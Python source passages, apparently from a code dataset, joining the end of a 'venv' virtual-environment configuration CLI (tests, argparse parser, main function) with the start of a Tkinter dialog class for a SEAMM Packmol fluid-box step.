        _env = Env(_APP=_APP)
        self.assertEqual(_env['_APP'], _APP)
        self.env = VenvTestUtils.build_env_test_fixture(_env)
        self.assertEqual(self.env['_APP'], _APP)
        venv = Venv(VENVSTR=self.env['VIRTUAL_ENV'],
                    _APP=_APP)
        self.assertIn('_APP', venv.env)
        self.assertEqual(venv.env['_APP'], self.env['_APP'])
        self.assertEqual(venv.env['_WRD'],
                         joinpath(self.env['_SRC'], self.env['_APP']))

    def test_020_venv_from_null_environ(self):
        self.assertRaises(Exception, Venv)

    def test_030_venv_without_environ(self):
        # VIRTUAL_ENV in os.environ alone (without from_environ=True)
        # is not read
        os.environ['VIRTUAL_ENV'] = self.env['VIRTUAL_ENV']
        with self.assertRaises(StepConfigException):
            venv = Venv()

    # Errors w/ travis: TODO XXX FIXME
    #def test_040_venv_with_environ(self):
        #os.environ['VIRTUAL_ENV'] = self.env['VIRTUAL_ENV']
        #venv = Venv(from_environ=True)
        #self.assertTrue(venv)
        #self.assertEqual(venv.env['VIRTUAL_ENV'], self.env['VIRTUAL_ENV'])

    def test_050_venv__VENVSTR__WORKON_HOME(self):
        """an explicit WORKON_HOME overrides the default prefix"""
        WORKON_HOME = '/WRKON_HOME'
        venv = Venv(self.env['VENVSTR'], WORKON_HOME=WORKON_HOME)
        self.assertTrue(venv)
        self.assertEqual(venv.env['WORKON_HOME'], WORKON_HOME)
        self.assertEqual(venv.env['_WRD'],
                         joinpath(WORKON_HOME,
                                  self.env['VIRTUAL_ENV_NAME'],
                                  'src',
                                  self.env['VENVSTR']))

    # TODO
    # def test_060_venv__VENVSTR__WRK(self):
        #__WRK = '/WRRK'
        #venv = Venv(VENVSTR=self.env['VENVSTR'], __WRK=__WRK)
        # self.assertTrue(venv)
        #self.assertEqual(venv.env['__WRK'], __WRK)
        # self.assertEqual(venv.env['_WRD'],
        # joinpath(__WRK,
        #'-ve27',
        # self.env['VIRTUAL_ENV_NAME'],
        #'src',
        # self.env['VENVSTR']))
class Test_900_Venv_main(VenvTestCase, unittest.TestCase):

    """CLI tests for :py:func:`main` (stdout/stderr captured)."""

    def setUp(self):
        self.env = VenvTestUtils.build_env_test_fixture()
        # wrap main as self.main on setup to always capture IO
        # (output, stdout, stderr)
        self.main = VenvTestUtils.capture_io(main)

    def test_001_main_null(self):
        #with self.assertRaises(SystemExit):
        #    retcode, stdout, stderr = self.main()
        #    self.assertEqual(retcode, 0)
        pass

    # calls SystemExit
    # def test_002_main_help(self):
    #    retcode, stdout, stderr = self.main('-h')
    #    self.assertEqual(retcode, 0)
    #    retcode, stdout, stderr = self.main('--help')
    #    self.assertEqual(retcode, 0)

    def test_100_main(self):
        retcode, stdout, stderr = self.main('dotfiles')
        self.assertEqual(retcode, 0)
        retcode, stdout, stderr = self.main(
            '--VIRTUAL_ENV', self.env['VIRTUAL_ENV'],
            '--APP', self.env['_APP'])
        self.assertEqual(retcode, 0)
        retcode, stdout, stderr = self.main(
            '--ve', 'dotfiles',
            '--app', 'dotfiles')
        self.assertEqual(retcode, 0)

    def test_110_main_VENVSTR(self):
        retcode, stdout, stderr = self.main('dotfiles')
        self.assertEqual(retcode, 0)
        retcode, stdout, stderr = self.main('dotfiles')
        self.assertEqual(retcode, 0)

    def test_120_main_print_bash_VENVSTR(self):
        retcode, stdout, stderr = self.main(
            '--print-vars',
            self.env['VENVSTR'])
        self.assertEqual(retcode, 0)
        retcode, stdout, stderr = self.main(
            '--print-vars',
            '--compress',
            self.env['VENVSTR'])
        self.assertEqual(retcode, 0)

    def test_130_main_print_bash_VENVSTR_VENVSTRAPP(self):
        (retcode, stdout, stderr) = (self.main(
            '--print-vars',
            self.env['VENVSTR'],
            self.env['_APP']))
        self.assertEqual(retcode, 0)

    def test_140_main_VENVSTR_WORKON_HOME(self):
        retcode, stdout, stderr = self.main('--print-vars',
                                            '--WORKON_HOME', '/WORKON_HOME',
                                            self.env['VENVSTR'])
        self.assertEqual(retcode, 0)

    def test_200_main_print_bash_VENVSTR__APP(self):
        retcode, stdout, stderr = self.main(
            '--print-bash',
            self.env['VENVSTR'],
            self.env['_APP'])
        self.assertEqual(retcode, 0)

    def test_200_main_print_bash(self):
        retcode, stdout, stderr = self.main('dotfiles', '--print-bash')
        self.assertEqual(retcode, 0)

    def test_210_main_print_bash_aliases(self):
        retcode, stdout, stderr = self.main('dotfiles', '--print-bash-aliases')
        self.assertEqual(retcode, 0)

    def test_220_main_print_bash_cdaliases(self):
        retcode, stdout, stderr = self.main('dotfiles', '--print-bash-cdaliases')
        self.assertEqual(retcode, 0)

    def test_300_main_print_zsh(self):
        retcode, stdout, stderr = self.main('dotfiles', '--print-zsh')
        self.assertEqual(retcode, 0)

    # BUGFIX: renamed from test_300_main_print_zsh, which shadowed the
    # --print-zsh test above (the first definition never ran)
    def test_310_main_print_zsh_cdalias(self):
        retcode, stdout, stderr = self.main('dotfiles', '--print-zsh-cdalias')
        self.assertEqual(retcode, 0)

    def test_400_main_print_vim(self):
        retcode, stdout, stderr = self.main('dotfiles', '--print-vim-cdalias')
        self.assertEqual(retcode, 0)
# returns an argparse.ArgumentParser (the old optparse comment was stale)
def build_venv_arg_parser():
    """
    Build the commandline interface parser.

    Returns:
        argparse.ArgumentParser: options for the commandline interface
        (the docstring previously claimed ``optparse.OptionParser``)
    """
    import argparse
    stdargs = argparse.ArgumentParser(add_help=False)
    prs = argparse.ArgumentParser(
        prog="venv",
        #usage=("%prog [-b|--print-bash] [-t] [-e] [-E<virtualenv>] [appname]"),
        description=(
            "venv is a configuration utility for virtual environments."),
        epilog=(
            "argparse.REMAINDER: "
            "If args must be specified, either (VENVSTR AND VENVSTRAPP) "
            "or (--ve [--app]) "
            "must be specified first: venv --ve dotfiles -xmake."),
        parents=[stdargs],
    )
    # general / logging options
    stdprs = prs
    stdprs.add_argument('-V', '--version',
                        dest='version',
                        action='store_true',)
    stdprs.add_argument('-v', '--verbose',
                        dest='verbose',
                        action='append_const',
                        const=1)
    stdprs.add_argument('-D', '--diff', '--show-diffs',
                        dest='show_diffs',
                        action='store_true',)
    stdprs.add_argument('-T', '--trace',
                        dest='trace',
                        action='store_true',)
    stdprs.add_argument('-q', '--quiet',
                        dest='quiet',
                        action='store_true',)
    stdprs.add_argument('-t', '--test',
                        dest='run_tests',
                        action='store_true',)
    prs.add_argument('--platform',
                     help='Platform string (default: None)',
                     dest='platform',
                     action='store',
                     default=None,
                     )
    # environment-variable options
    envprs = prs
    envprs.add_argument('-e', '--from-environ',
                        help="Build venv.env.environ from keys in os.environ",
                        dest='from_environ',
                        action='store_true',
                        )
    envprs.add_argument('--__WRK', '--WRK', '--wrk',
                        help="Path to workspace -- ~/-wrk",
                        dest='__WRK',
                        nargs='?',
                        action='store',
                        )
    envprs.add_argument('--__DOTFILES', '--DOTFILES', '--dotfiles',
                        help="Path to ${__DOTFILES} symlink -- ~/-dotfiles",
                        dest='__DOTFILES',
                        nargs='?',
                        action='store',
                        )
    envprs.add_argument('--WORKON_HOME', '--workonhome', '--wh',
                        help=("Path to ${WORKON_HOME} directory "
                              "containing VIRTUAL_ENVs"),
                        dest='WORKON_HOME',
                        nargs='?',
                        action='store',
                        )
    envprs.add_argument('--CONDA_ROOT', '--condaroot', '--cr',
                        help=("Path to ${CONDA_ROOT} directory "
                              "containing VIRTUAL_ENVs"),
                        dest='CONDA_ROOT',
                        nargs='?',
                        action='store',
                        )
    envprs.add_argument('--CONDA_ENVS_PATH', '--condaenvs', '--ce',
                        help=("Path to ${CONDA_ENVS_PATH} directory "
                              "containing VIRTUAL_ENVs"),
                        dest='CONDA_ENVS_PATH',
                        nargs='?',
                        action='store',
                        )
    # NOTE: dest='VENVSTR_' / 'VENVSTRAPP_' (trailing underscore) to avoid
    # colliding with the positional VENVSTR/VENVSTRAPP args below
    envprs.add_argument('--VENVSTR', '--venvstr', '--ve',
                        help=("Path to VIRTUAL_ENV -- "
                              "${WORKON_HOME}/${VIRTUAL_ENV_NAME} "
                              "(or a dirname in $WORKON_HOME) "),
                        dest='VENVSTR_',
                        nargs='?',
                        action='store')
    envprs.add_argument('--VENVSTRAPP', '--venvstrapp',
                        help=("Subpath within {VIRTUAL_ETC}/src/"),
                        dest='VENVSTRAPP_',
                        nargs='?',
                        action='store')
    envprs.add_argument('--VIRTUAL_ENV_NAME', '--virtual-env-name', '--vename',
                        help=("dirname in WORKON_HOME -- "
                              "${WORKON_HOME}/${VIRTUAL_ENV_NAME}"),
                        dest='VIRTUAL_ENV_NAME',
                        nargs='?',
                        action='store',
                        )
    envprs.add_argument('--VENVPREFIX', '--venvprefix', '--prefix',
                        help='Prefix for _SRC, _ETC, _WRD if [ -z VIRTUAL_ENV ]',
                        dest='VENVPREFIX',
                        nargs='?',
                        action='store')
    envprs.add_argument('--VIRTUAL_ENV', '--virtual-env',
                        help="Path to a $VIRTUAL_ENV",
                        dest='VIRTUAL_ENV',
                        nargs='?',
                        action='store',
                        )
    envprs.add_argument('--_SRC', '--SRC', '--src',
                        help='Path to source -- ${VIRTUAL_ENV}/src")',
                        dest='_SRC',
                        nargs='?',
                        action='store',
                        )
    envprs.add_argument('--_APP', '--APP', '--app',  # see also: --VENVSTRAPP
                        help="Path component string -- ${_SRC}/${_APP}",
                        dest='_APP',
                        nargs='?',
                        action='store',
                        )
    envprs.add_argument('--_WRD', '--WRD', '--wrd',
                        help="Path to working directory -- ${_SRC}/${_APP}",
                        dest='_WRD',
                        nargs='?',
                        action='store',
                        )
    # output/printing options
    # NOTE(review): prnprs is assigned but unused below (prs is used directly)
    prnprs = prs
    prs.add_argument('--print-json',
                     help="Print venv configuration as JSON",
                     dest='print_json',
                     action='store_true',
                     )
    prs.add_argument('--print-json-filename',
                     help="Path to write venv env JSON to",
                     dest='print_json_filename',
                     nargs='?',
                     action='store',
                     default='venv.json',
                     )
    prs.add_argument('--print-vars', '--vars',
                     help='Print vars',
                     dest='print_vars',
                     # nargs='?',
                     action='store_true',
                     default=None,
                     )
    prs.add_argument('--print-bash', '--bash',
                     help="Print Bash shell configuration",
                     dest='print_bash',
                     action='store_true',
                     default=None,
                     # default='venv.bash.sh',
                     )
    prs.add_argument('--print-bash-all',
                     help="Print Bash shell environ and aliases",
                     dest='print_bash_all',
                     action='store_true',
                     default=None,
                     # default='venv.bash.sh',
                     )
    prs.add_argument('--print-bash-aliases', '--bash-alias',
                     help="Print Bash alias script",
                     dest='print_bash_aliases',
                     action='store_true',
                     )
    prs.add_argument('--print-bash-cdaliases', '--bash-cdalias',
                     help="Print Bash cdalias script",
                     dest='print_bash_cdaliases',
                     action='store_true',
                     )
    prs.add_argument('-Z', '--print-zsh',
                     help="Print ZSH shell configuration",
                     dest='print_zsh',
                     action='store_true',
                     )
    prs.add_argument('--print-vim-cdalias', '--vim',
                     help="Print vimscript configuration ",
                     dest='print_vim_cdalias',
                     action='store_true',
                     )
    prs.add_argument('--print-ipython-magics',
                     help="Print IPython magic methods",
                     dest="print_venv_ipymagics",
                     action='store_true',)
    # command-running options
    prs.add_argument('--command', '--cmd', '-x',
                     help="Run a command in a venv-configured shell",
                     dest='run_command',
                     action='store',
                     )
    prs.add_argument('--run-bash', '--xbash', '-xb',
                     help="Run bash in the specified venv",
                     dest='run_bash',
                     action='store_true',
                     )
    prs.add_argument('--run-make', '--xmake', '-xmake',
                     help="Run (cd $_WRD; make $@) in the specified venv",
                     dest='run_make',
                     action='store_true',
                     )
    prs.add_argument('--run-editp', '--open-editors', '--edit', '-E',
                     help=("Open $EDITOR_ with venv.project_files"
                           " [$PROJECT_FILES]"),
                     dest='open_editors',
                     action='store_true',
                     default=False,
                     )
    prs.add_argument('--run-terminal', '--open-terminals', '--terminals', '--terms',
                     help="Open terminals within the venv [gnome-terminal]",
                     dest='open_terminals',
                     action='store_true',
                     default=False,
                     )
    # path-printing options
    #subparsers = prs.add_subparsers(help='subcommands')
    #pthprs = subparsers.add_parser('path', help='see: $0 path --help')
    pthprs = prs
    pthprs.add_argument('--pall', '--pathall',
                        help="Print possible paths for the given path",
                        dest="all_paths",
                        action='store_true',
                        )
    pthprs.add_argument('--pwrk', '--wrk-path',
                        help="Print $__WRK/$@",
                        dest="path__WRK",
                        action='store_true',
                        )
    pthprs.add_argument('--pworkonhome', '--workonhome-path', '--pwh',
                        help="Print $__WORKON_HOME/$@",
                        dest="path_WORKON_HOME",
                        action='store_true',
                        )
    pthprs.add_argument('--pvirtualenv', '--virtualenv-path', '--pv',
                        help="Print $VIRTUAL_ENV/${@}",
                        dest='path_VIRTUAL_ENV',
                        action='store_true',
                        )
    pthprs.add_argument('--psrc', '--src-path', '--ps',
                        help="Print $_SRC/${@}",
                        dest='path__SRC',
                        action='store_true',
                        )
    pthprs.add_argument('--pwrd', '--wrd-path', '--pw',
                        help="Print $_WRD/${@}",
                        dest='path__WRD',
                        action='store_true',
                        )
    pthprs.add_argument('--pdotfiles', '--dotfiles-path', '--pd',
                        help="Print ${__DOTFILES}/${path}",
                        dest='path__DOTFILES',
                        action='store_true',
                        )
    pthprs.add_argument('--prel', '--relative-path',
                        help="Print ${@}",
                        dest='relative_path',
                        action='store_true',
                        )
    pthprs.add_argument('--pkg-resource-path',
                        help="Path from pkg_resources.TODOTODO",
                        dest="pkg_resource_path",
                        action='store_true',
                        )
    pthprs.add_argument('--compress', '--compress-paths',
                        dest='compress_paths',
                        help='Path $VAR-ify the given paths from stdin',
                        action='store_true')
    # positional arguments
    prs.add_argument('VENVSTR',
                     help=(
                         'a name of a virtualenv in WORKON_HOME '
                         'OR a full path to a VIRTUAL_ENV'),
                     nargs='?',
                     action='store',
                     )
    prs.add_argument('VENVSTRAPP',
                     help="a path within _SRC (_WRD=_SRC/VENVSTRAPP)",
                     nargs='?',
                     action='store',
                     )
    # Store remaining args in a catchall list (opts.args)
    prs.add_argument('args', metavar='args', nargs=argparse.REMAINDER)
    return prs
def comment_comment(strblock, **kwargs):
    """
    Pretty-format an object and prefix every resulting line with a
    comment character.

    Args:
        strblock (object): value to pretty-print (``pprint.pformat`` is
            applied first, so a plain str will be rendered with repr
            quoting -- NOTE(review): verify that is intended for str input)
    Keyword Arguments:
        kwargs (dict): kwargs passed through to ``prepend_comment_char``
    Returns:
        str: newline-joined string with each line prefixed with the
        comment char
    """
    # prepend_comment_char is expected to yield one prefixed line at a time
    return u'\n'.join(
        prepend_comment_char(pprint.pformat(strblock), **kwargs))
def main(*argv, **kwargs):
    """
    main function called if ``__name__=="__main__"``

    Parses CLI options, builds a :class:`Venv` from the environment and/or
    options, and runs the requested print/run/path subcommands.

    Args:
        *argv: CLI arguments; when empty, ``sys.argv[1:]`` is used instead
    Keyword Arguments:
        stdout: writable stream for normal output (default: ``sys.stdout``)
        stderr: writable stream (default: ``sys.stderr``)
            NOTE(review): currently captured but never used below
    Returns:
        int: nonzero on error
    """
    stderr = kwargs.get('stderr', sys.stderr)
    stdout = kwargs.get('stdout', sys.stdout)
    prs = build_venv_arg_parser()
    # Normalize the argument vector: fall back to the process args
    if not argv:
        _argv = sys.argv[1:]
    else:
        _argv = list(argv)
    opts = prs.parse_args(args=_argv)
    # NOTE(review): parse_known_args gets *argv*, not the normalized _argv,
    # so `args` is empty when this is invoked without explicit arguments
    # from __main__ -- confirm this asymmetry is intended.
    _, args = prs.parse_known_args(argv)
    # opts.args
    # Inside IPython with no args, default to reading config from os.environ
    if not _argv and IN_IPYTHON:
        opts.from_environ = True
    if (not opts.quiet) or (not opts.version):
        logging.basicConfig(
            format="%(levelname)-6s %(message)s",
        )
        log = logging.getLogger(LOGNAME)
        if opts.verbose:
            log.setLevel(logging.DEBUG)
        else:
            log.setLevel(logging.INFO)  # DEFAULT
    # --quiet overrides verbosity: only errors are logged
    if opts.quiet:
        log = logging.getLogger(LOGNAME)
        log.setLevel(logging.ERROR)
    if opts.trace:
        global DEBUG_TRACE_MODPATH
        DEBUG_TRACE_MODPATH = opts.trace
    logevent('main()',
             {"sys.argv": sys.argv,
              "*argv": argv,
              "_argv": _argv,
              "args": args,
              "opts": opts.__dict__},
             level=logging.DEBUG)
    # --test: hand the remaining args to unittest and exit with its status
    if opts.run_tests:
        sys.argv = [sys.argv[0]] + opts.args
        sys.exit(unittest.main())
    if opts.version:
        # TODO: independently __version__ this standalone script
        # and version-stamp --print-[...]
        try:
            import dotfiles
            version = dotfiles.version
            print(version, file=stdout)
            return 0
        except ImportError:
            return 127
    # build or create a new Env
    if opts.from_environ:
        env = Env.from_environ(os.environ, verbose=opts.verbose)
    else:
        env = Env()
    # read variables from options into the initial env dict
    varnames = ['__WRK', '__DOTFILES', 'WORKON_HOME',
                'VENVSTR', 'VENVSTRAPP', 'VENVPREFIX',
                'VIRTUAL_ENV_NAME', 'VIRTUAL_ENV', '_SRC', '_WRD',
                'CONDA_ROOT', 'CONDA_ENVS_PATH',
                'CONDA_ENVS_DEFAULT', 'CONDA_ROOT_DEFAULT']
    # get opts from args and update env
    # (commandline options win over existing env values; conflicts are logged)
    for varname in varnames:
        value = getattr(opts, varname, None)
        if value is not None:
            existing_value = env.get(varname)
            if existing_value is not None and existing_value != value:
                logevent('main args', {
                    'msg': 'commandline options intersect with env',
                    'varname': varname,
                    'value': value,
                    'value_was': existing_value,
                }, level=logging.DEBUG)
            env[varname] = value
    # NOTE(review): opts.VENVSTR_ / opts.VENVSTRAPP_ (trailing underscore)
    # must be defined by parser options outside this view; the visible
    # positionals use dest VENVSTR / VENVSTRAPP -- verify.
    if opts.VENVSTR_:
        env['VENVSTR'] = opts.VENVSTR_
    if opts.VENVSTRAPP_:
        env['VENVSTRAPP'] = opts.VENVSTRAPP_
    logevent('main_env', env, wrap=True, level=logging.DEBUG)
    # At least one way of identifying the virtualenv must be given
    if not any((
            env.get('VENVPREFIX'),
            env.get('VIRTUAL_ENV'),
            env.get('VENVSTR'),
            opts.from_environ)):
        errmsg = ("You must specify one of VENVSTR, VIRTUAL_ENV, VENVPREFIX, "
                  "or -e|--from-environ")
        prs.error(errmsg)
    # TODO: handle paths
    # virtualenv [, appname]
    venv = Venv(env=env,
                open_editors=opts.open_editors,
                open_terminals=opts.open_terminals,
                show_diffs=opts.show_diffs,
                debug=opts.verbose,
                )
    output = stdout
    # All of the --print-* flags; used to decide whether stdin path
    # compression should run at the end.
    print_cmd_opts = (opts.print_json,
                      opts.print_vars,
                      opts.print_bash,
                      opts.print_bash_aliases,
                      opts.print_bash_cdaliases,
                      opts.print_bash_all,
                      opts.print_zsh,
                      opts.print_vim_cdalias,
                      opts.print_venv_ipymagics
                      )
    print_cmd = any(print_cmd_opts)
    if opts.print_vars:
        if False:  # TODO: any(print_cmd_opts):
            prs.error("--print-vars specfied when\n"
                      "writing to json, bash, zsh, or vim.")
        else:
            for block in venv.generate_vars_env(
                    compress_paths=opts.compress_paths):
                print(block, file=output)
    if opts.print_json:
        print(venv.to_json(indent=4), file=output)
    if opts.print_bash_all:
        for block in venv.generate_bash_env(compress_paths=opts.compress_paths,
                                            include_paths=True,
                                            include_aliases=True):
            print(block, file=output)
    if opts.print_bash:
        for block in venv.generate_bash_env(compress_paths=opts.compress_paths,
                                            include_paths=True,
                                            include_aliases=False):
            print(block, file=output)
    if opts.print_bash_aliases:
        for block in venv.generate_bash_env(compress_paths=opts.compress_paths,
                                            include_paths=False,
                                            include_aliases=True,
                                            include_cdaliases=True):
            print(block, file=output)
    if opts.print_bash_cdaliases:
        for block in venv.generate_bash_cdalias():
            print(block, file=output)
    if opts.print_vim_cdalias:
        for block in venv.generate_vim_cdalias():
            print(block, file=output)
    if opts.print_venv_ipymagics:
        for block in venv.generate_venv_ipymagics():
            print(block, file=output)
    # NOTE(review): `prcs` results below are never inspected (exit codes
    # from the spawned commands are ignored) -- verify intended.
    if opts.run_command:
        prcs = venv.call(opts.run_command)
    if opts.run_bash:
        prcs = venv.call('cd $_WRD; bash')
    if opts.run_make:
        # NOTE(review): this rebinds the local `args` (parse_known_args
        # remainder) to [] before the later paths section uses it -- confirm.
        args = []
        argstr = " ".join(opts.args)
        prcs = venv.call('cd $_WRD; make {}'.format(argstr))

    def get_pkg_resource_filename(filename):
        # Resolve a path inside the installed `dotfiles` package data
        import pkg_resources
        return pkg_resources.resource_filename('dotfiles', filename)
    if any((opts.all_paths,
            # TODO TODO TODO:
            # is there a way to
            # distinguish between unset and flag-specified-without-value
            # with argparse nargs='?'?
            opts.path__WRD,
            opts.path__DOTFILES,
            opts.relative_path,
            opts.pkg_resource_path)):
        # Collect the path fragments to resolve: VENVSTR, VENVSTRAPP,
        # then any remaining positional args.
        paths = []
        VENVSTR = env.get('VENVSTR')
        if VENVSTR:
            paths.append(VENVSTR)
        VENVSTRAPP = env.get('VENVSTRAPP')
        if VENVSTRAPP:
            paths.append(VENVSTRAPP)
        paths.extend(args)
        basepath = get_pkg_resource_filename('/')
        if opts.all_paths or opts.path__DOTFILES is not None:
            __DOTFILES = env.get('__DOTFILES',
                                 os.path.join('~', '-dotfiles'))
            env['__DOTFILES'] = __DOTFILES
        for pth in paths:
            resource_path = get_pkg_resource_filename(pth)
            if opts.all_paths or opts.relative_path:
                relpath = os.path.relpath(resource_path, basepath)
                print(relpath, file=stdout)
            if opts.all_paths or opts.pkg_resource_path:
                print(resource_path, file=stdout)
            if opts.all_paths or opts.path__DOTFILES is not None:
                dotfiles_path = os.path.join(env['__DOTFILES'], pth)
                print(dotfiles_path, file=stdout)
    # With no --print-* command, --compress compresses paths read from stdin
    if not print_cmd and opts.compress_paths:
        stdin = sys.stdin
        for l in stdin:
            pathstr = l.rstrip()
            #print(pathstr)
            output = venv.env.compress_paths(pathstr)
            print(output, file=stdout)
    return 0
if __name__ == "__main__":
    # Run the CLI; outside IPython propagate the exit status to the shell.
    retcode = main(*sys.argv[1:])
    if not IN_IPYTHON:
        sys.exit(retcode)
    else:
        # Under IPython, keep the session alive instead of exiting; when the
        # module is loaded as IPython configuration, wire up the magics.
        if IN_IPYTHON_CONFIG:
            logevent("ipython_main", "configuring IPython")
            ipython_main()
| StarcoderdataPython |
4806033 | # -*- coding: utf-8 -*-
"""The graphical part of a Packmol step"""
import logging
import tkinter as tk
import tkinter.ttk as ttk
from packmol_step import PackmolParameters
import seamm
import seamm_widgets as sw
logger = logging.getLogger(__name__)
class TkPackmol(seamm.TkNode):
    """Graphical interface for using Packmol for fluid boxes"""

    def __init__(
        self, tk_flowchart=None, node=None, canvas=None, x=None, y=None, w=200, h=50
    ):
        """Initialize a node

        Keyword arguments:
            tk_flowchart: the graphical flowchart this node belongs to
            node: the non-graphical node this class wraps
            canvas: the Tk canvas to draw on
            x, y, w, h: position and size of the node on the canvas
        """
        self.dialog = None
        # Working copy of the molecules table; each entry is a dict with
        # keys component/source/definition/count (plus transient "widgets").
        self._molecule_data = []
        # The "+" button that appends a row to the molecules table.
        self._add_molecule = None
        super().__init__(
            tk_flowchart=tk_flowchart, node=node, canvas=canvas, x=x, y=y, w=w, h=h
        )

    def create_dialog(self):
        """Create the dialog!"""
        frame = super().create_dialog(title="Edit PACKMOL parameters")
        # Create all the widgets
        P = self.node.parameters
        for key in P:
            if key not in ("molecules",):
                self[key] = P[key].widget(frame)
        # Frame for specifying molecules
        self["molecules"] = sw.ScrolledFrame(frame, height=500)
        w = self["molecules"].interior()
        # Column headers of the molecules table
        self["component"] = ttk.Label(w, text="Component")
        self["source"] = ttk.Label(w, text="Source")
        self["definition"] = ttk.Label(w, text="Definition")
        self["stoichiometry"] = ttk.Label(w, text="proportion")
        # And the molecule data -- copy so edits can be cancelled
        for molecule in P["molecules"].value:
            self._molecule_data.append({**molecule})
        # These parameters change which other widgets are shown
        for key in ("periodic", "shape", "dimensions", "fluid amount"):
            self[key].combobox.bind("<<ComboboxSelected>>", self.reset_dialog)
            self[key].combobox.bind("<Return>", self.reset_dialog)
            self[key].combobox.bind("<FocusOut>", self.reset_dialog)
        self.reset_dialog()
        # Resize the dialog to fill the screen, more or less.
        self.fit_dialog()

    def reset_dialog(self, widget=None):
        """Layout the widgets in the dialog contingent on the parameter values."""
        frame = self["frame"]
        # Reset everything
        columns, rows = frame.grid_size()
        for col in range(columns):
            frame.grid_columnconfigure(col, weight=0, minsize=0)
        for row in range(rows):
            frame.grid_rowconfigure(row, weight=0, minsize=0)
        for slave in frame.grid_slaves():
            slave.grid_forget()
        # The possible shapes depend on the periodicity
        periodic = self["periodic"].get()
        shape = self["shape"].get()
        if periodic == "Yes":
            shapes = PackmolParameters.periodic_shapes
        else:
            shapes = PackmolParameters.shapes
        self["shape"].combobox.config(values=shapes)
        if shape not in shapes:
            shape = shapes[0]
            self["shape"].set(shape)
        # The dimensions control the remaining widgets
        dimensions = self["dimensions"].get()
        widgets = []
        row = 0
        for key in ("periodic", "shape", "dimensions"):
            self[key].grid(row=row, column=0, sticky=tk.EW)
            row += 1
            widgets.append(self[key])
        # Which size widgets to show depends on how the cell is specified
        if dimensions == "given explicitly":
            if shape == "cubic":
                keys = ("edge length",)
            elif shape == "rectangular":
                keys = ("a", "b", "c")
            elif shape == "spherical":
                keys = ("diameter",)
            else:
                raise RuntimeError(f"Do not recognize shape '{shape}'")
            for key in keys:
                self[key].grid(row=row, column=0, sticky=tk.EW)
                row += 1
                widgets.append(self[key])
        elif dimensions == "calculated from the volume":
            if shape == "rectangular":
                keys = ("volume", "a_ratio", "b_ratio", "c_ratio")
            else:
                keys = ("volume",)
            for key in keys:
                self[key].grid(row=row, column=0, sticky=tk.EW)
                row += 1
                widgets.append(self[key])
        elif dimensions == "calculated from the solute dimensions":
            keys = ("solvent thickness",)
            for key in keys:
                self[key].grid(row=row, column=0, sticky=tk.EW)
                row += 1
                widgets.append(self[key])
        elif dimensions == "calculated from the density":
            if shape == "rectangular":
                keys = ("density", "a_ratio", "b_ratio", "c_ratio")
            else:
                keys = ("density",)
            for key in keys:
                self[key].grid(row=row, column=0, sticky=tk.EW)
                row += 1
                widgets.append(self[key])
        elif dimensions == "calculated using the Ideal Gas Law":
            if shape == "rectangular":
                keys = ("temperature", "pressure", "a_ratio", "b_ratio", "c_ratio")
            else:
                keys = ("temperature", "pressure")
            for key in keys:
                self[key].grid(row=row, column=0, sticky=tk.EW)
                row += 1
                widgets.append(self[key])
        else:
            raise RuntimeError(f"Do not recognize dimensions '{dimensions}'")
        # Next we need the amount of material. However the options change depending on
        # the above
        amount = self["fluid amount"].get()
        if dimensions in (
            "calculated from the density",
            "calculated using the Ideal Gas Law",
        ):
            amounts = PackmolParameters.amounts_for_density
        elif dimensions in ("calculated from the solute dimensions",):
            amounts = PackmolParameters.amounts_for_layer
        else:
            amounts = PackmolParameters.amounts
        self["fluid amount"].combobox.config(values=amounts)
        if amount not in amounts:
            amount = amounts[0]
            self["fluid amount"].set(amount)
        for key in ("fluid amount",):
            self[key].grid(row=row, column=0, sticky=tk.EW)
            row += 1
            widgets.append(self[key])
        if amount == "rounding this number of atoms":
            for key in ("approximate number of atoms",):
                self[key].grid(row=row, column=0, sticky=tk.EW)
                row += 1
                widgets.append(self[key])
        elif amount == "rounding this number of molecules":
            for key in ("approximate number of molecules",):
                self[key].grid(row=row, column=0, sticky=tk.EW)
                row += 1
                widgets.append(self[key])
        elif amount == "using the density":
            for key in ("density",):
                self[key].grid(row=row, column=0, sticky=tk.EW)
                row += 1
                widgets.append(self[key])
        elif amount == "using the Ideal Gas Law":
            for key in ("temperature", "pressure"):
                self[key].grid(row=row, column=0, sticky=tk.EW)
                row += 1
                widgets.append(self[key])
        else:
            raise RuntimeError(f"Do not recognize amount '{amount}'")
        sw.align_labels(widgets, sticky=tk.E)
        # The table of molecules to use
        self["molecules"].grid(row=row, column=0, columnspan=2, sticky=tk.NSEW)
        frame.grid_rowconfigure(row, weight=1, minsize=100)
        frame.grid_columnconfigure(1, weight=1)
        row += 1
        self.reset_molecules()
        # And finally, where to put the new system
        widgets = []
        for key in ("structure handling", "system name", "configuration name"):
            self[key].grid(row=row, column=0, sticky=tk.EW)
            row += 1
            widgets.append(self[key])
        sw.align_labels(widgets, sticky=tk.E)

    def reset_molecules(self):
        """Layout the table of molecules to use."""
        frame = self["molecules"].interior()
        # Unpack any widgets
        for slave in frame.grid_slaves():
            slave.grid_forget()
        # Put in the column headers.
        row = 0
        self["component"].grid(row=row, column=1, sticky=tk.EW)
        self["source"].grid(row=row, column=2, sticky=tk.EW)
        self["definition"].grid(row=row, column=3, sticky=tk.EW)
        self["stoichiometry"].grid(row=row, column=4, sticky=tk.EW)
        row += 1
        for data in self._molecule_data:
            # Per-row widgets are cached on the data dict and reused
            if "widgets" not in data:
                widgets = data["widgets"] = {}
            else:
                widgets = data["widgets"]
            if "remove" not in widgets:
                # The button to remove a row...
                # NOTE(review): `row` is bound at widget-creation time; after
                # a removal the remaining rows shift but existing buttons keep
                # their original row index -- verify this cannot misdelete.
                widgets["remove"] = ttk.Button(
                    frame,
                    text="-",
                    width=2,
                    command=lambda row=row: self.remove_molecule(row),
                    takefocus=True,
                )
            if "component" not in widgets:
                # the type of component
                widgets["component"] = ttk.Combobox(
                    frame,
                    values=("solute", "fluid"),
                    height=4,
                    width=6,
                    state="readonly",
                    takefocus=True,
                )
                widgets["component"].set(data["component"])
            if "source" not in widgets:
                # the type of source
                widgets["source"] = ttk.Combobox(
                    frame,
                    values=("configuration", "SMILES"),
                    height=4,
                    width=10,
                    state="readonly",
                    takefocus=True,
                )
                widgets["source"].set(data["source"])
            if "definition" not in widgets:
                # the SMILES ot system/configuration
                widgets["definition"] = ttk.Entry(frame, width=20, takefocus=True)
                widgets["definition"].insert("end", data["definition"])
            if "count" not in widgets:
                # The count for the stoichiometry
                widgets["count"] = ttk.Entry(frame, width=5, takefocus=True)
                widgets["count"].insert("end", data["count"])
            self.logger.debug("   widgets: " + str(widgets))
